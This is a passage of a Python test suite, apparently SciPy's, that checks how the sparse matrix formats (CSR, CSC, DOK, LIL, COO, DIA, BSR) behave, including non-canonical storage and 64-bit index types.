col = array([0, 1, 0, 0, 1, 1, 2, 2, 2, 2, 1])
data = array([6., 10., 3., 9., 1., 4.,
11., 2., 8., 5., 7.])
ij = vstack((row,col))
csr = csr_matrix((data,ij),(4,3))
assert_array_equal(arange(12).reshape(4,3),csr.todense())
def test_constructor5(self):
# infer dimensions from arrays
indptr = array([0,1,3,3])
indices = array([0,5,1,2])
data = array([1,2,3,4])
csr = csr_matrix((data, indices, indptr))
assert_array_equal(csr.shape,(3,6))
def test_sort_indices(self):
data = arange(5)
indices = array([7, 2, 1, 5, 4])
indptr = array([0, 3, 5])
asp = csr_matrix((data, indices, indptr), shape=(2,10))
bsp = asp.copy()
asp.sort_indices()
assert_array_equal(asp.indices,[1, 2, 7, 4, 5])
assert_array_equal(asp.todense(),bsp.todense())
def test_eliminate_zeros(self):
data = array([1, 0, 0, 0, 2, 0, 3, 0])
indices = array([1, 2, 3, 4, 5, 6, 7, 8])
indptr = array([0, 3, 8])
asp = csr_matrix((data, indices, indptr), shape=(2,10))
bsp = asp.copy()
asp.eliminate_zeros()
assert_array_equal(asp.nnz, 3)
assert_array_equal(asp.data,[1, 2, 3])
assert_array_equal(asp.todense(),bsp.todense())
def test_ufuncs(self):
X = csr_matrix(np.arange(20).reshape(4, 5) / 20.)
for f in ["sin", "tan", "arcsin", "arctan", "sinh", "tanh",
"arcsinh", "arctanh", "rint", "sign", "expm1", "log1p",
"deg2rad", "rad2deg", "floor", "ceil", "trunc", "sqrt"]:
assert_equal(hasattr(csr_matrix, f), True)
X2 = getattr(X, f)()
assert_equal(X.shape, X2.shape)
assert_array_equal(X.indices, X2.indices)
assert_array_equal(X.indptr, X2.indptr)
assert_array_equal(X2.toarray(), getattr(np, f)(X.toarray()))
def test_unsorted_arithmetic(self):
data = arange(5)
indices = array([7, 2, 1, 5, 4])
indptr = array([0, 3, 5])
asp = csr_matrix((data, indices, indptr), shape=(2,10))
data = arange(6)
indices = array([8, 1, 5, 7, 2, 4])
indptr = array([0, 2, 6])
bsp = csr_matrix((data, indices, indptr), shape=(2,10))
assert_equal((asp + bsp).todense(), asp.todense() + bsp.todense())
def test_fancy_indexing_broadcast(self):
# broadcasting indexing mode is supported
I = np.array([[1], [2], [3]])
J = np.array([3, 4, 2])
np.random.seed(1234)
D = np.asmatrix(np.random.rand(5, 7))
S = self.spmatrix(D)
SIJ = S[I,J]
if isspmatrix(SIJ):
SIJ = SIJ.todense()
assert_equal(SIJ, D[I,J])
def test_has_sorted_indices(self):
"Ensure has_sorted_indices memoizes sorted state for sort_indices"
sorted_inds = np.array([0, 1])
unsorted_inds = np.array([1, 0])
data = np.array([1, 1])
indptr = np.array([0, 2])
M = csr_matrix((data, sorted_inds, indptr)).copy()
assert_equal(True, M.has_sorted_indices)
M = csr_matrix((data, unsorted_inds, indptr)).copy()
assert_equal(False, M.has_sorted_indices)
# set by sorting
M.sort_indices()
assert_equal(True, M.has_sorted_indices)
assert_array_equal(M.indices, sorted_inds)
M = csr_matrix((data, unsorted_inds, indptr)).copy()
        # set manually (although the underlying indices are unsorted)
M.has_sorted_indices = True
assert_equal(True, M.has_sorted_indices)
assert_array_equal(M.indices, unsorted_inds)
# ensure sort bypassed when has_sorted_indices == True
M.sort_indices()
assert_array_equal(M.indices, unsorted_inds)
def test_has_canonical_format(self):
"Ensure has_canonical_format memoizes state for sum_duplicates"
M = csr_matrix((np.array([2]), np.array([0]), np.array([0, 1])))
assert_equal(True, M.has_canonical_format)
indices = np.array([0, 0]) # contains duplicate
data = np.array([1, 1])
indptr = np.array([0, 2])
M = csr_matrix((data, indices, indptr)).copy()
assert_equal(False, M.has_canonical_format)
# set by deduplicating
M.sum_duplicates()
assert_equal(True, M.has_canonical_format)
assert_equal(1, len(M.indices))
M = csr_matrix((data, indices, indptr)).copy()
        # set manually (although the underlying indices contain duplicates)
M.has_canonical_format = True
assert_equal(True, M.has_canonical_format)
assert_equal(2, len(M.indices)) # unaffected content
# ensure deduplication bypassed when has_canonical_format == True
M.sum_duplicates()
assert_equal(2, len(M.indices)) # unaffected content
class TestCSC(sparse_test_class()):
spmatrix = csc_matrix
checked_dtypes = [np.bool_, np.int_, np.float_, np.complex_]
def test_constructor1(self):
b = matrix([[1,0,0,0],[0,0,1,0],[0,2,0,3]],'d')
bsp = csc_matrix(b)
assert_array_almost_equal(bsp.data,[1,2,1,3])
assert_array_equal(bsp.indices,[0,2,1,2])
assert_array_equal(bsp.indptr,[0,1,2,3,4])
assert_equal(bsp.getnnz(),4)
assert_equal(bsp.shape,b.shape)
assert_equal(bsp.getformat(),'csc')
def test_constructor2(self):
b = zeros((6,6),'d')
b[2,4] = 5
bsp = csc_matrix(b)
assert_array_almost_equal(bsp.data,[5])
assert_array_equal(bsp.indices,[2])
assert_array_equal(bsp.indptr,[0,0,0,0,0,1,1])
def test_constructor3(self):
b = matrix([[1,0],[0,0],[0,2]],'d')
bsp = csc_matrix(b)
assert_array_almost_equal(bsp.data,[1,2])
assert_array_equal(bsp.indices,[0,2])
assert_array_equal(bsp.indptr,[0,1,2])
def test_constructor4(self):
# using (data, ij) format
row = array([2, 3, 1, 3, 0, 1, 3, 0, 2, 1, 2])
col = array([0, 1, 0, 0, 1, 1, 2, 2, 2, 2, 1])
data = array([6., 10., 3., 9., 1., 4.,
11., 2., 8., 5., 7.])
ij = vstack((row,col))
csc = csc_matrix((data,ij),(4,3))
assert_array_equal(arange(12).reshape(4,3),csc.todense())
def test_constructor5(self):
# infer dimensions from arrays
indptr = array([0,1,3,3])
indices = array([0,5,1,2])
data = array([1,2,3,4])
csc = csc_matrix((data, indices, indptr))
assert_array_equal(csc.shape,(6,3))
def test_eliminate_zeros(self):
data = array([1, 0, 0, 0, 2, 0, 3, 0])
indices = array([1, 2, 3, 4, 5, 6, 7, 8])
indptr = array([0, 3, 8])
asp = csc_matrix((data, indices, indptr), shape=(10,2))
bsp = asp.copy()
asp.eliminate_zeros()
assert_array_equal(asp.nnz, 3)
assert_array_equal(asp.data,[1, 2, 3])
assert_array_equal(asp.todense(),bsp.todense())
def test_sort_indices(self):
data = arange(5)
row = array([7, 2, 1, 5, 4])
ptr = [0, 3, 5]
asp = csc_matrix((data, row, ptr), shape=(10,2))
bsp = asp.copy()
asp.sort_indices()
assert_array_equal(asp.indices,[1, 2, 7, 4, 5])
assert_array_equal(asp.todense(),bsp.todense())
def test_ufuncs(self):
X = csc_matrix(np.arange(21).reshape(7, 3) / 21.)
for f in ["sin", "tan", "arcsin", "arctan", "sinh", "tanh",
"arcsinh", "arctanh", "rint", "sign", "expm1", "log1p",
"deg2rad", "rad2deg", "floor", "ceil", "trunc", "sqrt"]:
assert_equal(hasattr(csr_matrix, f), True)
X2 = getattr(X, f)()
assert_equal(X.shape, X2.shape)
assert_array_equal(X.indices, X2.indices)
assert_array_equal(X.indptr, X2.indptr)
assert_array_equal(X2.toarray(), getattr(np, f)(X.toarray()))
def test_unsorted_arithmetic(self):
data = arange(5)
indices = array([7, 2, 1, 5, 4])
indptr = array([0, 3, 5])
asp = csc_matrix((data, indices, indptr), shape=(10,2))
data = arange(6)
indices = array([8, 1, 5, 7, 2, 4])
indptr = array([0, 2, 6])
bsp = csc_matrix((data, indices, indptr), shape=(10,2))
assert_equal((asp + bsp).todense(), asp.todense() + bsp.todense())
def test_fancy_indexing_broadcast(self):
# broadcasting indexing mode is supported
I = np.array([[1], [2], [3]])
J = np.array([3, 4, 2])
np.random.seed(1234)
D = np.asmatrix(np.random.rand(5, 7))
S = self.spmatrix(D)
SIJ = S[I,J]
if isspmatrix(SIJ):
SIJ = SIJ.todense()
assert_equal(SIJ, D[I,J])
class TestDOK(sparse_test_class(minmax=False, nnz_axis=False)):
spmatrix = dok_matrix
checked_dtypes = [np.int_, np.float_, np.complex_]
def test_mult(self):
A = dok_matrix((10,10))
A[0,3] = 10
A[5,6] = 20
D = A*A.T
E = A*A.H
assert_array_equal(D.A, E.A)
def test_add_nonzero(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
A = self.spmatrix((3,2))
A[0,1] = -10
A[2,0] = 20
A = A + 10
B = matrix([[10, 0], [10, 10], [30, 10]])
assert_array_equal(A.todense(), B)
A = A + 1j
B = B + 1j
assert_array_equal(A.todense(), B)
def test_dok_divide_scalar(self):
A = self.spmatrix((3,2))
A[0,1] = -10
A[2,0] = 20
assert_array_equal((A/1j).todense(), A.todense()/1j)
assert_array_equal((A/9).todense(), A.todense()/9)
def test_convert(self):
# Test provided by Andrew Straw. Fails in SciPy <= r1477.
(m, n) = (6, 7)
a = dok_matrix((m, n))
# set a few elements, but none in the last column
a[2,1] = 1
a[0,2] = 2
a[3,1] = 3
a[1,5] = 4
a[4,3] = 5
a[4,2] = 6
# assert that the last column is all zeros
assert_array_equal(a.toarray()[:,n-1], zeros(m,))
# make sure it still works for CSC format
csc = a.tocsc()
assert_array_equal(csc.toarray()[:,n-1], zeros(m,))
# now test CSR
(m, n) = (n, m)
b = a.transpose()
assert_equal(b.shape, (m, n))
# assert that the last row is all zeros
assert_array_equal(b.toarray()[m-1,:], zeros(n,))
# make sure it still works for CSR format
csr = b.tocsr()
assert_array_equal(csr.toarray()[m-1,:], zeros(n,))
def test_ctor(self):
# Empty ctor
assert_raises(TypeError, dok_matrix)
# Dense ctor
b = matrix([[1,0,0,0],[0,0,1,0],[0,2,0,3]],'d')
A = dok_matrix(b)
assert_equal(b.dtype, A.dtype)
assert_equal(A.todense(), b)
# Sparse ctor
c = csr_matrix(b)
assert_equal(A.todense(), c.todense())
data = [[0, 1, 2], [3, 0, 0]]
d = dok_matrix(data, dtype=np.float32)
assert_equal(d.dtype, np.float32)
da = d.toarray()
assert_equal(da.dtype, np.float32)
assert_array_equal(da, data)
def test_resize(self):
        # A couple of basic tests of the resize() method.
#
# resize(shape) resizes the array in-place.
a = dok_matrix((5,5))
a[:,0] = 1
a.resize((2,2))
expected1 = array([[1,0],[1,0]])
assert_array_equal(a.todense(), expected1)
a.resize((3,2))
expected2 = array([[1,0],[1,0],[0,0]])
assert_array_equal(a.todense(), expected2)
def test_ticket1160(self):
# Regression test for ticket #1160.
a = dok_matrix((3,3))
a[0,0] = 0
        # This assert would fail, because the above assignment would
        # incorrectly call __setitem__ even though the value was 0.
assert_((0,0) not in a.keys(), "Unexpected entry (0,0) in keys")
# Slice assignments were also affected.
b = dok_matrix((3,3))
b[:,0] = 0
assert_(len(b.keys()) == 0, "Unexpected entries in keys")
##
## TODO: The DOK matrix currently returns invalid results rather
## than raising errors in some indexing operations
##
@dec.knownfailureif(True, "known deficiency in DOK")
def test_fancy_indexing(self):
pass
@dec.knownfailureif(True, "known deficiency in DOK")
def test_add_sub(self):
pass
class TestLIL(sparse_test_class(minmax=False)):
spmatrix = lil_matrix
checked_dtypes = [np.int_, np.float_, np.complex_]
def test_dot(self):
A = matrix(zeros((10,10)))
A[0,3] = 10
A[5,6] = 20
B = lil_matrix((10,10))
B[0,3] = 10
B[5,6] = 20
assert_array_equal(A * A.T, (B * B.T).todense())
assert_array_equal(A * A.H, (B * B.H).todense())
def test_scalar_mul(self):
x = lil_matrix((3,3))
x[0,0] = 2
x = x*2
assert_equal(x[0,0],4)
x = x*0
assert_equal(x[0,0],0)
def test_reshape(self):
x = lil_matrix((4,3))
x[0,0] = 1
x[2,1] = 3
x[3,2] = 5
x[0,2] = 7
for s in [(12,1),(1,12)]:
assert_array_equal(x.reshape(s).todense(),
x.todense().reshape(s))
def test_inplace_ops(self):
A = lil_matrix([[0,2,3],[4,0,6]])
B = lil_matrix([[0,1,0],[0,2,3]])
data = {'add': (B,A + B),
'sub': (B,A - B),
'mul': (3,A * 3)}
for op,(other,expected) in data.items():
result = A.copy()
getattr(result, '__i%s__' % op)(other)
assert_array_equal(result.todense(), expected.todense())
# Ticket 1604.
A = lil_matrix((1,3), dtype=np.dtype('float64'))
B = array([0.1,0.1,0.1])
A[0,:] += B
assert_array_equal(A[0,:].toarray().squeeze(), B)
def test_lil_iteration(self):
row_data = [[1,2,3],[4,5,6]]
B = lil_matrix(array(row_data))
for r,row in enumerate(B):
assert_array_equal(row.todense(),array(row_data[r],ndmin=2))
def test_lil_from_csr(self):
# Tests whether a lil_matrix can be constructed from a
# csr_matrix.
B = lil_matrix((10,10))
B[0,3] = 10
B[5,6] = 20
B[8,3] = 30
B[3,8] = 40
B[8,9] = 50
C = B.tocsr()
D = lil_matrix(C)
assert_array_equal(C.A, D.A)
def test_fancy_indexing_lil(self):
M = asmatrix(arange(25).reshape(5,5))
A = lil_matrix(M)
assert_equal(A[array([1,2,3]),2:3].todense(), M[array([1,2,3]),2:3])
def test_point_wise_multiply(self):
l = lil_matrix((4,3))
l[0,0] = 1
l[1,1] = 2
l[2,2] = 3
l[3,1] = 4
m = lil_matrix((4,3))
m[0,0] = 1
m[0,1] = 2
m[2,2] = 3
m[3,1] = 4
m[3,2] = 4
assert_array_equal(l.multiply(m).todense(),
m.multiply(l).todense())
assert_array_equal(l.multiply(m).todense(),
[[1,0,0],
[0,0,0],
[0,0,9],
[0,16,0]])
def test_lil_multiply_removal(self):
# Ticket #1427.
a = lil_matrix(np.ones((3,3)))
a *= 2.
a[0, :] = 0
class TestCOO(sparse_test_class(getset=False,
slicing=False, slicing_assign=False,
fancy_indexing=False, fancy_assign=False)):
spmatrix = coo_matrix
checked_dtypes = [np.int_, np.float_, np.complex_]
def test_constructor1(self):
# unsorted triplet format
row = array([2, 3, 1, 3, 0, 1, 3, 0, 2, 1, 2])
col = array([0, 1, 0, 0, 1, 1, 2, 2, 2, 2, 1])
data = array([6., 10., 3., 9., 1., 4.,
11., 2., 8., 5., 7.])
coo = coo_matrix((data,(row,col)),(4,3))
assert_array_equal(arange(12).reshape(4,3),coo.todense())
def test_constructor2(self):
# unsorted triplet format with duplicates (which are summed)
row = array([0,1,2,2,2,2,0,0,2,2])
col = array([0,2,0,2,1,1,1,0,0,2])
data = array([2,9,-4,5,7,0,-1,2,1,-5])
coo = coo_matrix((data,(row,col)),(3,3))
mat = matrix([[4,-1,0],[0,0,9],[-3,7,0]])
assert_array_equal(mat,coo.todense())
def test_constructor3(self):
# empty matrix
coo = coo_matrix((4,3))
assert_array_equal(coo.shape,(4,3))
assert_array_equal(coo.row,[])
assert_array_equal(coo.col,[])
assert_array_equal(coo.data,[])
assert_array_equal(coo.todense(),zeros((4,3)))
def test_constructor4(self):
# from dense matrix
mat = array([[0,1,0,0],
[7,0,3,0],
[0,4,0,0]])
coo = coo_matrix(mat)
assert_array_equal(coo.todense(),mat)
# upgrade rank 1 arrays to row matrix
mat = array([0,1,0,0])
coo = coo_matrix(mat)
assert_array_equal(coo.todense(),mat.reshape(1,-1))
# COO does not have a __getitem__ to support iteration
def test_iterator(self):
pass
def test_todia_all_zeros(self):
zeros = [[0, 0]]
dia = coo_matrix(zeros).todia()
assert_array_equal(dia.A, zeros)
def test_sum_duplicates(self):
coo = coo_matrix((4,3))
coo.sum_duplicates()
coo = coo_matrix(([1,2], ([1,0], [1,0])))
coo.sum_duplicates()
assert_array_equal(coo.A, [[2,0],[0,1]])
coo = coo_matrix(([1,2], ([1,1], [1,1])))
coo.sum_duplicates()
assert_array_equal(coo.A, [[0,0],[0,3]])
assert_array_equal(coo.row, [1])
assert_array_equal(coo.col, [1])
assert_array_equal(coo.data, [3])
def test_todok_duplicates(self):
coo = coo_matrix(([1,1,1,1], ([0,2,2,0], [0,1,1,0])))
dok = coo.todok()
assert_array_equal(dok.A, coo.A)
class TestDIA(sparse_test_class(getset=False, slicing=False, slicing_assign=False,
fancy_indexing=False, fancy_assign=False,
minmax=False, nnz_axis=False)):
spmatrix = dia_matrix
checked_dtypes = [np.int_, np.float_, np.complex_]
def test_constructor1(self):
D = matrix([[1, 0, 3, 0],
[1, 2, 0, 4],
[0, 2, 3, 0],
[0, 0, 3, 4]])
data = np.array([[1,2,3,4]]).repeat(3,axis=0)
offsets = np.array([0,-1,2])
assert_equal(dia_matrix((data,offsets), shape=(4,4)).todense(), D)
# DIA does not have a __getitem__ to support iteration
def test_iterator(self):
pass
@with_64bit_maxval_limit(3)
def test_setdiag_dtype(self):
m = dia_matrix(np.eye(3))
assert_equal(m.offsets.dtype, np.int32)
m.setdiag((3,), k=2)
assert_equal(m.offsets.dtype, np.int32)
m = dia_matrix(np.eye(4))
assert_equal(m.offsets.dtype, np.int64)
m.setdiag((3,), k=3)
assert_equal(m.offsets.dtype, np.int64)
class TestBSR(sparse_test_class(getset=False,
slicing=False, slicing_assign=False,
fancy_indexing=False, fancy_assign=False,
nnz_axis=False)):
spmatrix = bsr_matrix
checked_dtypes = [np.int_, np.float_, np.complex_]
def test_constructor1(self):
# check native BSR format constructor
indptr = array([0,2,2,4])
indices = array([0,2,2,3])
data = zeros((4,2,3))
data[0] = array([[0, 1, 2],
[3, 0, 5]])
data[1] = array([[0, 2, 4],
[6, 0, 10]])
data[2] = array([[0, 4, 8],
[12, 0, 20]])
data[3] = array([[0, 5, 10],
[15, 0, 25]])
A = kron([[1,0,2,0],[0,0,0,0],[0,0,4,5]], [[0,1,2],[3,0,5]])
Asp = bsr_matrix((data,indices,indptr),shape=(6,12))
assert_equal(Asp.todense(),A)
# infer shape from arrays
Asp = bsr_matrix((data,indices,indptr))
assert_equal(Asp.todense(),A)
def test_constructor2(self):
# construct from dense
# test zero mats
for shape in [(1,1), (5,1), (1,10), (10,4), (3,7), (2,1)]:
A = zeros(shape)
assert_equal(bsr_matrix(A).todense(),A)
A = zeros((4,6))
assert_equal(bsr_matrix(A,blocksize=(2,2)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,3)).todense(),A)
A = kron([[1,0,2,0],[0,0,0,0],[0,0,4,5]], [[0,1,2],[3,0,5]])
assert_equal(bsr_matrix(A).todense(),A)
assert_equal(bsr_matrix(A,shape=(6,12)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(1,1)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,3)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,6)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(2,12)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(3,12)).todense(),A)
assert_equal(bsr_matrix(A,blocksize=(6,12)).todense(),A)
A = kron([[1,0,2,0],[0,1,0,0],[0,0,0,0]], [[0,1,2],[3,0,5]])
assert_equal(bsr_matrix(A,blocksize=(2,3)).todense(),A)
def test_eliminate_zeros(self):
data = kron([1, 0, 0, 0, 2, 0, 3, 0], [[1,1],[1,1]]).T
data = data.reshape(-1,2,2)
indices = array([1, 2, 3, 4, 5, 6, 7, 8])
indptr = array([0, 3, 8])
asp = bsr_matrix((data, indices, indptr), shape=(4,20))
bsp = asp.copy()
asp.eliminate_zeros()
assert_array_equal(asp.nnz, 3*4)
assert_array_equal(asp.todense(),bsp.todense())
def test_bsr_matvec(self):
A = bsr_matrix(arange(2*3*4*5).reshape(2*4,3*5), blocksize=(4,5))
x = arange(A.shape[1]).reshape(-1,1)
assert_equal(A*x, A.todense()*x)
def test_bsr_matvecs(self):
A = bsr_matrix(arange(2*3*4*5).reshape(2*4,3*5), blocksize=(4,5))
x = arange(A.shape[1]*6).reshape(-1,6)
assert_equal(A*x, A.todense()*x)
@dec.knownfailureif(True, "BSR not implemented")
def test_iterator(self):
pass
@dec.knownfailureif(True, "known deficiency in BSR")
def test_setdiag(self):
pass
#------------------------------------------------------------------------------
# Tests for non-canonical representations (with duplicates, unsorted indices)
#------------------------------------------------------------------------------
def _same_sum_duplicate(data, *inds, **kwargs):
"""Duplicates entries to produce the same matrix"""
indptr = kwargs.pop('indptr', None)
if np.issubdtype(data.dtype, np.bool_) or \
np.issubdtype(data.dtype, np.unsignedinteger):
if indptr is None:
return (data,) + inds
else:
return (data,) + inds + (indptr,)
zeros_pos = (data == 0).nonzero()
# duplicate data
data = data.repeat(2, axis=0)
data[::2] -= 1
data[1::2] = 1
# don't spoil all explicit zeros
if zeros_pos[0].size > 0:
pos = tuple(p[0] for p in zeros_pos)
pos1 = (2*pos[0],) + pos[1:]
pos2 = (2*pos[0]+1,) + pos[1:]
data[pos1] = 0
data[pos2] = 0
inds = tuple(indices.repeat(2) for indices in inds)
if indptr is None:
return (data,) + inds
else:
return (data,) + inds + (indptr * 2,)
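# Illustrative sketch (not part of the original code): _same_sum_duplicate
# splits each stored value v into the pair (v - 1, 1) on repeated indices, so
# the matrix obtained after summing duplicates is unchanged.
def _example_same_sum_duplicate():
    data = np.array([3., 5.])
    row = np.array([0, 1])
    col = np.array([1, 0])
    data2, row2, col2 = _same_sum_duplicate(data, row, col)
    A = coo_matrix((data, (row, col)), shape=(2, 2))
    B = coo_matrix((data2, (row2, col2)), shape=(2, 2))
    # B stores twice as many entries, yet densifies to the same matrix.
    assert_allclose(A.A, B.A)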
class _NonCanonicalMixin(object):
def spmatrix(self, D, **kwargs):
"""Replace D with a non-canonical equivalent: containing
duplicate elements and explicit zeros"""
construct = super(_NonCanonicalMixin, self).spmatrix
M = construct(D, **kwargs)
zero_pos = (M.A == 0).nonzero()
has_zeros = (zero_pos[0].size > 0)
if has_zeros:
k = zero_pos[0].size//2
M = self._insert_explicit_zero(M,
zero_pos[0][k],
zero_pos[1][k])
arg1 = self._arg1_for_noncanonical(M)
if 'shape' not in kwargs:
kwargs['shape'] = M.shape
NC = construct(arg1, **kwargs)
# check that result is valid
assert_allclose(NC.A, M.A)
        # check that at least one explicit zero is present
if has_zeros:
assert_((NC.data == 0).any())
return NC
@dec.knownfailureif(True, 'abs broken with non-canonical matrix')
def test_abs(self):
pass
@dec.knownfailureif(True, 'bool(matrix) broken with non-canonical matrix')
def test_bool(self):
pass
@dec.knownfailureif(True, 'min/max broken with non-canonical matrix')
def test_minmax(self):
pass
@dec.knownfailureif(True, 'format conversion broken with non-canonical matrix')
def test_sparse_format_conversions(self):
pass
@dec.knownfailureif(True, 'unary ufunc overrides broken with non-canonical matrix')
def test_unary_ufunc_overrides(self):
pass
@dec.knownfailureif(True, 'some binary ufuncs fail with scalars for noncanonical matrices')
def test_binary_ufunc_overrides(self):
pass
@dec.knownfailureif(True, 'getnnz-axis broken with non-canonical matrix')
def test_getnnz_axis(self):
pass
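# Illustrative sketch (not part of the original suite): a "non-canonical" CSR
# keeps duplicate column indices and explicitly stored zeros; its dense view
# equals that of the canonical matrix, only the internal storage differs.
def _example_noncanonical_csr():
    indptr = np.array([0, 3, 4])
    indices = np.array([0, 0, 1, 1])   # column 0 appears twice in row 0
    data = np.array([1., 2., 0., 5.])  # the 0.0 is stored explicitly
    M = csr_matrix((data, indices, indptr), shape=(2, 2))
    assert_array_equal(M.A, [[3., 0.], [0., 5.]])
    # nnz counts stored entries, including duplicates and explicit zeros.
    assert_equal(M.nnz, 4)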
class _NonCanonicalCompressedMixin(_NonCanonicalMixin):
def _arg1_for_noncanonical(self, M):
"""Return non-canonical constructor arg1 equivalent to M"""
data, indices, indptr = _same_sum_duplicate(M.data, M.indices,
indptr=M.indptr)
# unsorted
for start, stop in izip(indptr, indptr[1:]):
indices[start:stop] = indices[start:stop][::-1].copy()
data[start:stop] = data[start:stop][::-1].copy()
return data, indices, indptr
def _insert_explicit_zero(self, M, i, j):
M[i,j] = 0
return M
class _NonCanonicalCSMixin(_NonCanonicalCompressedMixin):
@dec.knownfailureif(True, '__getitem__ with non-canonical matrix broken for sparse boolean index due to __gt__')
def test_fancy_indexing_sparse_boolean(self):
pass
@dec.knownfailureif(True, 'broadcasting element-wise multiply broken with non-canonical matrix')
def test_elementwise_multiply_broadcast(self):
pass
@dec.knownfailureif(True, 'inverse broken with non-canonical matrix')
def test_inv(self):
pass
@dec.knownfailureif(True, 'solve broken with non-canonical matrix')
def test_solve(self):
pass
class TestCSRNonCanonical(_NonCanonicalCSMixin, TestCSR):
@dec.knownfailureif(True, 'nnz counts explicit zeros')
def test_empty(self):
pass
class TestCSCNonCanonical(_NonCanonicalCSMixin, TestCSC):
@dec.knownfailureif(True, 'nnz counts explicit zeros')
def test_empty(self):
pass
@dec.knownfailureif(True, 'nonzero reports explicit zeros')
def test_nonzero(self):
pass
class TestBSRNonCanonical(_NonCanonicalCompressedMixin, TestBSR):
def _insert_explicit_zero(self, M, i, j):
x = M.tocsr()
x[i,j] = 0
return x.tobsr(blocksize=M.blocksize)
@dec.knownfailureif(True, 'unary ufunc overrides broken with non-canonical BSR')
def test_diagonal(self):
pass
@dec.knownfailureif(True, 'unary ufunc overrides broken with non-canonical BSR')
def test_expm(self):
pass
@dec.knownfailureif(True, 'inequalities require sum_duplicates, not implemented for BSR')
def test_eq(self):
pass
@dec.knownfailureif(True, 'inequalities require sum_duplicates, not implemented for BSR')
def test_ne(self):
pass
@dec.knownfailureif(True, 'inequalities require sum_duplicates, not implemented for BSR')
def test_gt(self):
pass
@dec.knownfailureif(True, 'inequalities require sum_duplicates, not implemented for BSR')
def test_lt(self):
pass
@dec.knownfailureif(True, 'inequalities require sum_duplicates, not implemented for BSR')
def test_ge(self):
pass
@dec.knownfailureif(True, 'inequalities require sum_duplicates, not implemented for BSR')
def test_le(self):
pass
@dec.knownfailureif(True, 'maximum and minimum fail for non-canonical BSR')
def test_maximum_minimum(self):
pass
@dec.knownfailureif(True, 'nnz counts explicit zeros')
def test_empty(self):
pass
class TestCOONonCanonical(_NonCanonicalMixin, TestCOO):
def _arg1_for_noncanonical(self, M):
"""Return non-canonical constructor arg1 equivalent to M"""
data, row, col = _same_sum_duplicate(M.data, M.row, M.col)
return data, (row, col)
def _insert_explicit_zero(self, M, i, j):
M.data = np.r_[M.data.dtype.type(0), M.data]
M.row = np.r_[M.row.dtype.type(i), M.row]
M.col = np.r_[M.col.dtype.type(j), M.col]
return M
def test_setdiag_noncanonical(self):
m = self.spmatrix(np.eye(3))
m.sum_duplicates()
m.setdiag([3, 2], k=1)
m.sum_duplicates()
assert_(np.all(np.diff(m.col) >= 0))
@dec.knownfailureif(True, 'nnz counts explicit zeros')
def test_empty(self):
pass
class Test64Bit(object):
TEST_CLASSES = [TestBSR, TestCOO, TestCSC, TestCSR, TestDIA,
# lil/dok->other conversion operations have get_index_dtype
TestDOK, TestLIL
]
MAT_CLASSES = [bsr_matrix, coo_matrix, csc_matrix, csr_matrix, dia_matrix]
# The following features are missing, so skip the tests:
SKIP_TESTS = {
'test_expm': 'expm for 64-bit indices not available',
'test_solve': 'linsolve for 64-bit indices not available'
}
def _create_some_matrix(self, mat_cls, m, n):
return mat_cls(np.random.rand(m, n))
def _compare_index_dtype(self, m, dtype):
dtype = np.dtype(dtype)
if isinstance(m, csc_matrix) or isinstance(m, csr_matrix) \
or isinstance(m, bsr_matrix):
return (m.indices.dtype == dtype) and (m.indptr.dtype == dtype)
elif isinstance(m, coo_matrix):
return (m.row.dtype == dtype) and (m.col.dtype == dtype)
elif isinstance(m, dia_matrix):
return (m.offsets.dtype == dtype)
else:
raise ValueError("matrix %r has no integer indices" % (m,))
def test_decorator_maxval_limit(self):
# Test that the with_64bit_maxval_limit decorator works
@with_64bit_maxval_limit(maxval_limit=10)
def check(mat_cls):
m = mat_cls(np.random.rand(10, 1))
assert_(self._compare_index_dtype(m, np.int32))
m = mat_cls(np.random.rand(11, 1))
assert_(self._compare_index_dtype(m, np.int64))
for mat_cls in self.MAT_CLASSES:
yield check, mat_cls
def test_decorator_maxval_random(self):
# Test that the with_64bit_maxval_limit decorator works (2)
@with_64bit_maxval_limit(random=True)
def check(mat_cls):
seen_32 = False
seen_64 = False
for k in range(100):
m = self._create_some_matrix(mat_cls, 9, 9)
seen_32 = seen_32 or self._compare_index_dtype(m, np.int32)
seen_64 = seen_64 or self._compare_index_dtype(m, np.int64)
if seen_32 and seen_64:
break
else:
raise AssertionError("both 32 and 64 bit indices not seen")
for mat_cls in self.MAT_CLASSES:
yield check, mat_cls
def _check_resiliency(self, **kw):
# Resiliency test, to check that sparse matrices deal reasonably
# with varying index data types.
skip = kw.pop('skip', ())
@with_64bit_maxval_limit(**kw)
def check(cls, method_name):
instance = cls()
if hasattr(instance, 'setup'):
instance.setup()
try:
getattr(instance, method_name)()
finally:
if hasattr(instance, 'teardown'):
instance.teardown()
for cls in self.TEST_CLASSES:
for method_name in dir(cls):
method = getattr(cls, method_name)
if (method_name.startswith('test_') and
not getattr(method, 'slow', False) and
(cls.__name__ + '.' + method_name) not in skip):
msg = self.SKIP_TESTS.get(method_name)
yield dec.skipif(msg, msg)(check), cls, method_name
def test_resiliency_limit_10(self):
for t in self._check_resiliency(maxval_limit=10):
yield t
def test_resiliency_random(self):
# bsr_matrix.eliminate_zeros relies on csr_matrix constructor
# not making copies of index arrays --- this is not
# necessarily true when we pick the index data type randomly
skip = ['TestBSR.test_eliminate_zeros']
for t in self._check_resiliency(random=True, skip=skip):
yield t
def test_resiliency_all_32(self):
for t in self._check_resiliency(fixed_dtype=np.int32):
yield t
def test_resiliency_all_64(self):
for t in self._check_resiliency(fixed_dtype=np.int64):
yield t
def test_no_64(self):
for t in self._check_resiliency(assert_32bit=True):
yield t
def test_downcast_intp(self):
# Check that bincount and ufunc.reduceat intp downcasts are
# dealt with. The point here is to trigger points in the code
# that can fail on 32-bit systems when using 64-bit indices,
# due to use of functions that only work with intp-size
# indices.
@with_64bit_maxval_limit(fixed_dtype=np.int64,
downcast_maxval=1)
def check_limited():
# These involve indices larger than `downcast_maxval`
a = csc_matrix([[1, 2], [3, 4], [5, 6]])
assert_raises(AssertionError, a.getnnz, axis=1)
assert_raises(AssertionError, a.sum, axis=0)
a = csr_matrix([[1, 2, 3], [3, 4, 6]])
assert_raises(AssertionError, a.getnnz, axis=0)
a = coo_matrix([[1, 2, 3], [3, 4, 5]])
assert_raises(AssertionError, a.getnnz, axis=0)
